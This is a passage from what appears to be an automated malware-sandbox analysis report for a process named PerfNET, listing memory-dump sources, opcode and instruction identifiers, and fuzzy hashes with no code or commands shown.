                                                      • Instruction Fuzzy Hash: DF91C371A1DAAD4FE759EB6C88797A87FE1EF66314F0501BED059CB2E2CAB81410C740

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2901422633.00007FFD9BEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ffd9bea0000_PerfNET.jbxd
                                                      Similarity
                                                      • API ID: FullImageNameProcessQuery
                                                      • String ID:
                                                      • API String ID: 3578328331-0
                                                      • Opcode ID: 01131fa16eda8c162a43bf3bae3712f1d0f8bf5bbf51ee63e41f67b2ac5db08d
                                                      • Instruction ID: a8c8c2227fee24b91de13e86b23ddb80ba193e1c3de2b0dd7bb8002b56a5147b
                                                      • Opcode Fuzzy Hash: 01131fa16eda8c162a43bf3bae3712f1d0f8bf5bbf51ee63e41f67b2ac5db08d
                                                      • Instruction Fuzzy Hash: 1871CF70608A4C8FDB68DF28C8557F977E5FB58311F00426EE84EC72A2CB75A9458B81
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 78bdb56f1dc29db4db271a4895667b0feceb4ac4e27759c6823aaee15d4e4ab4
                                                      • Instruction ID: bf636b4c27c6f2710a8dd60ab8765daefd27bcfb81feacf82014b96d01548221
                                                      • Opcode Fuzzy Hash: 78bdb56f1dc29db4db271a4895667b0feceb4ac4e27759c6823aaee15d4e4ab4
                                                      • Instruction Fuzzy Hash: 8A410A22B0C5690EE318F7BC64B56F97781DF5933AB0445FBD45ECB1D7CD18A8418684
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2b4f4c0b0322c833cf0db99c0e705a83f26580f9724ec8646c3af39e61cd66b6
                                                      • Instruction ID: 32d8137f49a9d08637b015f53e0fea26f311e93e13d1314483a87b51dc2456b0
                                                      • Opcode Fuzzy Hash: 2b4f4c0b0322c833cf0db99c0e705a83f26580f9724ec8646c3af39e61cd66b6
                                                      • Instruction Fuzzy Hash: 20412A22B0C6690EE328F7BC64A95F977C1DF5933AB0445BBE45ECB1D7CD18A8418684
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 51cbe14d0d43ebd5dc5a1c4813638f714b5e099323c0b8590eb5d87ef2820576
                                                      • Instruction ID: 58b3878831386c7e656b84fd15e88d56bd1ca9370b1ffdaf892555e5faed596b
                                                      • Opcode Fuzzy Hash: 51cbe14d0d43ebd5dc5a1c4813638f714b5e099323c0b8590eb5d87ef2820576
                                                      • Instruction Fuzzy Hash: B031B721B1C92D0FE768B76C646AAF963C1DF5833AF1442BBE41EC71E7CD59AC418284
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2f245b0a842226dde17c760c1ee9fb17fc565d2ffc49c8a73700d849c6f1bbce
                                                      • Instruction ID: 0d93d1604939067923a6b17b988c1a2bf5d4d5c8927b007b5bf81f91122dc041
                                                      • Opcode Fuzzy Hash: 2f245b0a842226dde17c760c1ee9fb17fc565d2ffc49c8a73700d849c6f1bbce
                                                      • Instruction Fuzzy Hash: E3214921B1892D0FE798F76C847DA7972C2EF98325F0001B9E41DC32F7DD58AC414644
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5b39e0ec60c50a6c798be20d7d477371d199b7cae7cee5bb2dc997becde457ab
                                                      • Instruction ID: 10299792a3910156bc52a4e50473ed879d77340b9b84fd22d2195e11209ec05e
                                                      • Opcode Fuzzy Hash: 5b39e0ec60c50a6c798be20d7d477371d199b7cae7cee5bb2dc997becde457ab
                                                      • Instruction Fuzzy Hash: FC212932B0D26D8FE332A7B99C611EC7B60EF52325F1541B3D0548B1D3DA786646CB85
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9673c7498b1153afec43840890dbba05a4ed5be8429bc2a14c2bf99f5a05bbbf
                                                      • Instruction ID: 16b1c56b8436f3c8b6daad0fc0680202037a091e498ecb08752bcd10b44f410a
                                                      • Opcode Fuzzy Hash: 9673c7498b1153afec43840890dbba05a4ed5be8429bc2a14c2bf99f5a05bbbf
                                                      • Instruction Fuzzy Hash: C4110B22F1E56A0BF7A4E76C44313B961D2EF98360F0542B6E45DC31E7ED1C6E444B81
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9d1695f9011940f600c4ff131e228e2cdfb0116adbebec2a697214469c8ffac4
                                                      • Instruction ID: a760d6fc6c45c86cfeefb0ac3206b222bdb0ef01d12b371ea7b9860d243eef0b
                                                      • Opcode Fuzzy Hash: 9d1695f9011940f600c4ff131e228e2cdfb0116adbebec2a697214469c8ffac4
                                                      • Instruction Fuzzy Hash: 1E213330E0992D8FDB64DB48D860BA877A1FB54310F1545BAD01EE32A1CA79AEC1CF45
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 595865f9ac49519f6e07fb473f9c672e1eef0bf6e3e3ed6c2c7e1281b746ec28
                                                      • Instruction ID: 68c969947e36b841aabdb8180abd70e94199a5f303f64082bae0b835292d4364
                                                      • Opcode Fuzzy Hash: 595865f9ac49519f6e07fb473f9c672e1eef0bf6e3e3ed6c2c7e1281b746ec28
                                                      • Instruction Fuzzy Hash: 88012B1195E6D51FD76957B44C715B13F90CF97260B0A01FAD095CB1F3C88D18868351
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b508dd2fc52da2ce6d519f5edafab9781ed6cc27cd4afca38914279c2a730195
                                                      • Instruction ID: e10dcca21811afb16b1ec244e835bb7578edace44dc64ed1a122fa74d9b1f4fa
                                                      • Opcode Fuzzy Hash: b508dd2fc52da2ce6d519f5edafab9781ed6cc27cd4afca38914279c2a730195
                                                      • Instruction Fuzzy Hash: B2112531B0D25C8FE722EBA8C8601EC7FB0EF52310F0645B7C054DB2A2EA7856058B84
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 94a93bbe4ddfd84c33f725c8ba123d90caa396b219fb4306dab0cd68829200c0
                                                      • Instruction ID: 45537faf2bc08fd949a9ab96697a2fe9e5293f80001a51c0ccddb7999d442182
                                                      • Opcode Fuzzy Hash: 94a93bbe4ddfd84c33f725c8ba123d90caa396b219fb4306dab0cd68829200c0
                                                      • Instruction Fuzzy Hash: DC01C431A0D29C8FE722DBA8C8601DD7FB0EF56310F1545B7D054DB2A2DA7456458B84
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f4cde3bfe63f0488c7b4debe9dc85052246be7a66b0068182d3c7cadc1d1fc23
                                                      • Instruction ID: 9e8743dcee7a80611661799a11cf0675e20b771b19680cc69d0585faf3e917b3
                                                      • Opcode Fuzzy Hash: f4cde3bfe63f0488c7b4debe9dc85052246be7a66b0068182d3c7cadc1d1fc23
                                                      • Instruction Fuzzy Hash: A3014421F1A82D4EE7B0979C84347BC92D1EF48710F5601B5D46DE32F5DD68AE404B00
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a236a219535f05123e48a59ae01efc467d928eaf20ff39d1bfbfb97ea65ef8c9
                                                      • Instruction ID: 1b563342e310eaef12a75398be50d70b8f43e9575c649e04e3af15316bf52e82
                                                      • Opcode Fuzzy Hash: a236a219535f05123e48a59ae01efc467d928eaf20ff39d1bfbfb97ea65ef8c9
                                                      • Instruction Fuzzy Hash: 0E01B131A0E28C8FE722EBA8C8601DC7FB0EF56310F1541F7D054DB2A2EA786644CB80
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d9ed77b3ee9512be791f139bbb78e80d932ad8a684d0b4f98781cc3bdaf590ab
                                                      • Instruction ID: c84e94f8700a5da25a89b18cc978d32332eb98e6dd78a325826209b5597b3a24
                                                      • Opcode Fuzzy Hash: d9ed77b3ee9512be791f139bbb78e80d932ad8a684d0b4f98781cc3bdaf590ab
                                                      • Instruction Fuzzy Hash: 8401F431F1A82E4EEB74AB98C864AF97361EF54310F5605B9C01DD72F1DDB86A818E00
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3bdbfb8008c0cebc7d9fe5aa3a84915b0d5a394845714f64351a85b9edff9b1e
                                                      • Instruction ID: 46a05a63e6d721d9767d9d40e66ba3098e352b87dc28e80420f3d960c2f1b51f
                                                      • Opcode Fuzzy Hash: 3bdbfb8008c0cebc7d9fe5aa3a84915b0d5a394845714f64351a85b9edff9b1e
                                                      • Instruction Fuzzy Hash: AD01A230E0E28D9FE721EBA488641DD7FB0EF56304F1541E7D054DB2A6EA785644CB81
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 01f23fd8ff7d3dbc033ca4ce13e8970fcd12da7b2d08477b8899274bfec7eb3f
                                                      • Instruction ID: ce6d2b48a3629fd41846294db981db9ec435e9a63f869b155bf05f22009fdd38
                                                      • Opcode Fuzzy Hash: 01f23fd8ff7d3dbc033ca4ce13e8970fcd12da7b2d08477b8899274bfec7eb3f
                                                      • Instruction Fuzzy Hash: 32F0E53511E649CFD741DB38C8A56C4BFA0FF02649F8A11FAC08AC75A2E3245C5DCB40
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6e86717bdb073f436a190d2855632088ba179429547b89731434fb8820439f1f
                                                      • Instruction ID: ad6d68973ca28b61c4c5b27e6b4c7099c6e00c61a3f3731e02e96e6e7c978da2
                                                      • Opcode Fuzzy Hash: 6e86717bdb073f436a190d2855632088ba179429547b89731434fb8820439f1f
                                                      • Instruction Fuzzy Hash: 8EF05431F0A41D4EEB70EB88C464BF96392EF55310F1642B5C41DD72F5DD68BA818E40
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 85e983f40b709b5bfea59c0b13adc4c3cdeb24bb54e43aff68340677cfa0abdb
                                                      • Instruction ID: 74b7a0155316131d57192a7db8c651bee971bf4ff048114bf84620e801e9e940
                                                      • Opcode Fuzzy Hash: 85e983f40b709b5bfea59c0b13adc4c3cdeb24bb54e43aff68340677cfa0abdb
                                                      • Instruction Fuzzy Hash: 23F0B430F0960E8FE764DB6984A46BD77E0EF55711F1042BAD019C22D5DA7866848F44
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d815330f0ae0852c63c7eee0d72713f426d07b677879dce111832211fc32f74d
                                                      • Instruction ID: 783ab0265ee28872421e01d5319368944899f51d0faa24d482b923d980380965
                                                      • Opcode Fuzzy Hash: d815330f0ae0852c63c7eee0d72713f426d07b677879dce111832211fc32f74d
                                                      • Instruction Fuzzy Hash: FFE02621F1C85906EB7CB67468B25B07280DF85324B0502B9D42AC22DACC4D1CC14381
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8abae7e4bf594c026a3c2e0c3309027240db6ecfc1cde7bd98f6a8efb3b4e525
                                                      • Instruction ID: 19a67f0a305d25ba98c9390f1bdcbfa2bf199a8fd26aefa9b1e563cfd8605895
                                                      • Opcode Fuzzy Hash: 8abae7e4bf594c026a3c2e0c3309027240db6ecfc1cde7bd98f6a8efb3b4e525
                                                      • Instruction Fuzzy Hash: 4AE01220F1912A46F7B49344C8707AD7295EBA4300F1540B8D51EA33E1CD78AF45CF49
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8412c96ce81615c6353acab22cf40caa1155164eef89bcc1232d6f886c5ba5e4
                                                      • Instruction ID: cfbfc06b0b0e6ae27cebf3b4cf1c5dd14bf8a85e1874eb3d8a6160c83235200c
                                                      • Opcode Fuzzy Hash: 8412c96ce81615c6353acab22cf40caa1155164eef89bcc1232d6f886c5ba5e4
                                                      • Instruction Fuzzy Hash: 4CC08C34A1180C8FD908EB2CC98490833E0FB0A304BC200A0E00DC7172E65AEDC2CB81
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a4a71e5b2110fd454efaf29df05a1d51e4324152f29b3885dc9d4fe0b37887c3
                                                      • Instruction ID: 8b62a2613242e5d00bb5040576e828843c3d016d40306d0e4ac823cb9bde0458
                                                      • Opcode Fuzzy Hash: a4a71e5b2110fd454efaf29df05a1d51e4324152f29b3885dc9d4fe0b37887c3
                                                      • Instruction Fuzzy Hash: 40C04C05F5B53F01F53573EF58760ACB5409BD5A50FD70176D52C800E19CDD22D50A5E
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6524eeca7e0f7a46f031b6ffd445f97ae654a5d377843ddc14cf26d532475833
                                                      • Instruction ID: 16d86103845ac531eef7d8b09cfd11588e8c2c14ca39991880721322c73647a4
                                                      • Opcode Fuzzy Hash: 6524eeca7e0f7a46f031b6ffd445f97ae654a5d377843ddc14cf26d532475833
                                                      • Instruction Fuzzy Hash: 1FC04C01F2CC2E46F6696318483167E04525F5471DF5501B8E02E863DECD6C5D4216CB
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6c91385e51ffae7aacf19c1359f094a5c132148be1a8cd28b3fb5c26677793f9
                                                      • Instruction ID: c37ab9bc07c87af99de6e91fc235e2982cd53192ceec1f1e43b33c0e7cc27f63
                                                      • Opcode Fuzzy Hash: 6c91385e51ffae7aacf19c1359f094a5c132148be1a8cd28b3fb5c26677793f9
                                                      • Instruction Fuzzy Hash: EFB01204D5742F00E53433FB0C5206874409B44100FC20070D41C8009198CD12940B47
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2516164899.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_7ffd9bab0000_PerfNET.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c9$!k9$"s9$#{9
                                                      • API String ID: 0-1692736845
                                                      • Opcode ID: 6f275f707c27e1e373fe3aca86a1946b8b5f99f60616248b3690759445dfc79e
                                                      • Instruction ID: 121aaad85f25199983486927109cb33aa3c0799bf483374e5128a036fcb7ca8e
                                                      • Opcode Fuzzy Hash: 6f275f707c27e1e373fe3aca86a1946b8b5f99f60616248b3690759445dfc79e
                                                      • Instruction Fuzzy Hash: 89419007B0957645E23973FD78229ED5B448FA927FB0847B7F56E8D0D74C486081C2E9